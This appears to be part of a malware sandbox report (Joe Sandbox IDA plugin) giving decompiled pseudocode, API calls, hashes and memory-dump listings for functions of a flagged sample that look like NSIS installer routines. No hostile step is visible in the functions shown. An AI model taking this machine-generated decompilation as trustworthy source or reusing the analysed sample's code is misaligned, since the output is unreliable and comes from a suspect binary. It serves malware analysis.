C:\Users\user\AppData\Local\Temp\nsbA35F.tmp, xrefs: 004025DB

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp$C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll
API String ID: 3109718747-3235477043
Opcode ID: 29697b63a1bf179c8a70b2ea45890600dc215057ee6868cc9ec1e4f57a159bbe
Instruction ID: 59cf546ef3811be8ee7c727c8e5eea11e2141b44b9e391d5d171073bbb1e77e0
Opcode Fuzzy Hash: 29697b63a1bf179c8a70b2ea45890600dc215057ee6868cc9ec1e4f57a159bbe
Instruction Fuzzy Hash: F611EB72A01204BEDB146FB18E8EA9F77659F45398F20453BF102F61C1DAFC89415B5E

Uniqueness

Uniqueness Score: -1.00%

Function 100022D0 Relevance: 7.6, APIs: 5, Instructions: 135
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E100022D0(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed int* _t42;
				signed int* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[6];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[6] = _t41;
							goto L12;
						} else {
							_t37 = E100012BA(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E10001243();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[2]); // 0x1020
						_t42 = _t13;
						if(_t51[1] != 0xffffffff) {
						}
						_t38 =  *_t51;
						_t51[7] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M10002447))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E10001311(__ebp);
									goto L21;
								case 2:
									 *__edi = E10001311(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x1000406c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
									goto L27;
								case 4:
									__eax = E1000122C(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E10001311(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									asm("cdq");
									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E1000122C(0x10004044);
					goto L10;
				}
			}

0x100022e4
0x100022e8
0x100022f3
0x100022f3
0x100022fa
0x100022ff
0x00000000
0x00000000
0x10002303
0x10002306
0x00000000
0x00000000
0x1000230b
0x10002316
0x10002326
0x00000000
0x1000231d
0x1000231f
0x10002335
0x00000000
0x10002335
0x1000230d
0x1000230d
0x10002336
0x10002336
0x10002338
0x1000233c
0x1000233c
0x1000233f
0x1000233f
0x10002347
0x1000234e
0x10002351
0x10002410
0x10002411
0x1000241c
0x10002446
0x10002446
0x1000242c
0x10002438
0x1000242e
0x1000242e
0x1000242e
0x00000000
0x10002357
0x10002357
0x00000000
0x1000235e
0x00000000
0x00000000
0x10002366
0x00000000
0x00000000
0x10002374
0x10002376
0x00000000
0x00000000
0x10002397
0x1000239d
0x100023a0
0x100023a2
0x100023b2
0x00000000
0x00000000
0x1000237f
0x10002384
0x10002387
0x10002388
0x00000000
0x00000000
0x100023be
0x100023c4
0x100023c5
0x100023c8
0x100023c9
0x100023cb
0x00000000
0x00000000
0x100023d7
0x100023da
0x100023e6
0x100023e8
0x00000000
0x00000000
0x100023f4
0x10002400
0x10002403
0x10002405
0x10002408
0x00000000
0x00000000
0x10002357
0x10002351
0x1000232b
0x10002330
0x00000000
0x10002330

APIs

GlobalFree.KERNEL32(00000000), ref: 10002411

Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C

GlobalAlloc.KERNEL32(00000040), ref: 10002397
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2

Memory Dump Source

Source File: 00000001.00000002.29266932000.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.29266891366.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.29266969679.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.29267005182.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65

Uniqueness

Uniqueness Score: -1.00%

Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x10001619
0x10001625
0x10001632
0x10001639
0x10001642
0x1000164e

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
GlobalFree.KERNEL32(00000000), ref: 10001642

Memory Dump Source

Source File: 00000001.00000002.29266932000.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.29266891366.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.29266969679.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.29267005182.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1

Uniqueness

Uniqueness Score: -1.00%

Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401D57() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x24));
				GetClientRect(_t25, _t27 - 0x58);
				_t18 = SendMessageW(_t25, 0x172, _t22, LoadImageW(_t22, E00402C37(_t22), _t22,  *(_t27 - 0x50) *  *(_t27 - 0x20),  *(_t27 - 0x4c) *  *(_t27 - 0x20), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401d63
0x00401d6a
0x00401d99
0x00401da1
0x00401da8
0x00401da8
0x00402ac2
0x00402ace

APIs

GetDlgItem.USER32(?,?), ref: 00401D5D
GetClientRect.USER32(00000000,?), ref: 00401D6A
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
DeleteObject.GDI32(00000000), ref: 00401DA8

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: c7f94385dd4a6174af72edd052602ed5a5951d747682783072fd515e99349627
Instruction ID: face61d34558c4de7c2b3a6e9a6cb1e1a296a7661f17e088ac2b3614559d71e0
Opcode Fuzzy Hash: c7f94385dd4a6174af72edd052602ed5a5951d747682783072fd515e99349627
Instruction Fuzzy Hash: 2DF0FF72604518AFDB01DBE4DF88CEEB7BCEB48341B14047AF641F6191CA749D019B78

Uniqueness

Uniqueness Score: -1.00%

Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C19(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402C15(3);
				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
				 *(_t64 - 0x10) = _t29;
				_t30 = E00402C15(4);
				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x10)) = E00402C37(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402C37(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402C37();
					_t32 = E00402C37();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x10),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402C15();
					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
					_t41 = E00402C15(2);
					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x30) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8), _t46, _t56, _t64 - 0x30);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0x30));
					E004061C9();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c19
0x00401c1b
0x00401c22
0x00401c25
0x00401c28
0x00401c32
0x00401c36
0x00401c39
0x00401c42
0x00401c42
0x00401c45
0x00401c49
0x00401c52
0x00401c52
0x00401c55
0x00401c59
0x00401c5b
0x00401cb0
0x00401cb2
0x00401cbd
0x00401cc7
0x00401cca
0x00401cca
0x00401cd3
0x00000000
0x00401c5d
0x00401c64
0x00401c66
0x00401c69
0x00401c6f
0x00401c76
0x00401c79
0x00401ca1
0x00401cd9
0x00401cd9
0x00401c7b
0x00401c89
0x00401c91
0x00401c94
0x00401c94
0x00401c79
0x00401cdc
0x00401cdf
0x00401ce5
0x00402a65
0x00402a65
0x00402ac2
0x00402ace

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1

Strings

!, xrefs: 00401C55

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
Instruction ID: 74a91dccfe9731269d403f92625f9bdea7e35384dcad0b9637cdbdb8d435ba20
Opcode Fuzzy Hash: d3cd4e237e97a83a370d1370055c4bdc9f0797550a95890627c0fc6a79ec6b1b
Instruction Fuzzy Hash: 4D21C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB18

Uniqueness

Uniqueness Score: -1.00%

Function 00404AA2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404AA2(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004062A4(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004062A4(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004062A4(_t44, _t50, 0x42d248, 0x42d248, _a8);
				wsprintfW(_t34 + lstrlenW(0x42d248) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x433eb8, _a4, 0x42d248);
			}

0x00404aab
0x00404ab0
0x00404ab8
0x00404ab9
0x00404ac6
0x00404ace
0x00404acf
0x00404ad1
0x00404ad3
0x00404ad5
0x00404ad8
0x00404ad8
0x00404adf
0x00404ae5
0x00404ae5
0x00404aec
0x00404af3
0x00404af6
0x00404af9
0x00404af9
0x00404afd
0x00404b0d
0x00404b0f
0x00404b12
0x00404abb
0x00404abb
0x00404ac2
0x00404ac2
0x00404b1a
0x00404b25
0x00404b3b
0x00404b4c
0x00404b68

APIs

lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00435000), ref: 00404B43
wsprintfW.USER32 ref: 00404B4C
SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F

Strings

%u.%u%s%s, xrefs: 00404B2D

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
Instruction ID: a69b8d9c405cb410f429d1b91b3aaf5cd8934f07bb3ea9cf38393447591b3b6c
Opcode Fuzzy Hash: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
Instruction Fuzzy Hash: EA11EB736041283BDB00A66DDC42E9F369CDB81338F154237FA66F21D1D9B8D82146E8

Uniqueness

Uniqueness Score: -1.00%

Function 00405BFE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BFE(WCHAR* _a4) {
				WCHAR* _t5;
				short* _t7;
				WCHAR* _t10;
				short _t11;
				WCHAR* _t12;
				void* _t14;

				_t12 = _a4;
				_t10 = CharNextW(_t12);
				_t5 = CharNextW(_t10);
				_t11 =  *_t12;
				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
					if(_t11 != 0x5c || _t12[1] != _t11) {
						L10:
						return 0;
					} else {
						_t14 = 2;
						while(1) {
							_t14 = _t14 - 1;
							_t7 = E00405B80(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 2;
							if(_t14 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextW(_t5);
				}
			}

0x00405c07
0x00405c0e
0x00405c11
0x00405c13
0x00405c19
0x00405c31
0x00405c53
0x00000000
0x00405c39
0x00405c3b
0x00405c3c
0x00405c3f
0x00405c40
0x00405c49
0x00000000
0x00000000
0x00405c4c
0x00405c4f
0x00000000
0x00000000
0x00000000
0x00405c4f
0x00000000
0x00405c3c
0x00405c28
0x00000000
0x00405c29

APIs

CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,75523420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75523420,00000000), ref: 00405C0C
CharNextW.USER32(00000000), ref: 00405C11
CharNextW.USER32(00000000), ref: 00405C29

Strings

C:\, xrefs: 00405BFF

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharNext
String ID: C:\
API String ID: 3213498283-3404278061
Opcode ID: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
Instruction ID: 71472b9638db6d5cc2cef3a2d8db9d1c11fc55a0834b756b62a4f8b04705d027
Opcode Fuzzy Hash: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
Instruction Fuzzy Hash: B7F09662908F1555FF317A945C45ABB57B8DB54BA0B00C83BD602B72C0E3B85CC58E9A

Uniqueness

Uniqueness Score: -1.00%

Function 00405B53 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405B53(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405b54
0x00405b61
0x00405b62
0x00405b6d
0x00405b75
0x00405b75
0x00405b7d

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75523420,004035BF,?,00000006,00000008,0000000A), ref: 00405B59
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75523420,004035BF,?,00000006,00000008,0000000A), ref: 00405B63
lstrcatW.KERNEL32(?,0040A014), ref: 00405B75

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B53

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
